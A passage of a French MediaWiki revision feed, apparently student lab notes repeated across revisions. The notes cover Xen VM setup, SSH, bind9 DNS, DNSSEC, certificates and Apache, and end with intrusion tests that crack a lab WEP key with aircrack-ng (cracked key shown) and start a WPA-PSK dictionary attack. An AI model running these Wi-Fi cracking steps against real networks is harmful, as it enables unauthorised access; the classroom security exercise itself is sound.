 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57727</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57727"/>
				<updated>2022-01-10T16:24:31Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57726</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57726"/>
				<updated>2022-01-10T16:24:04Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
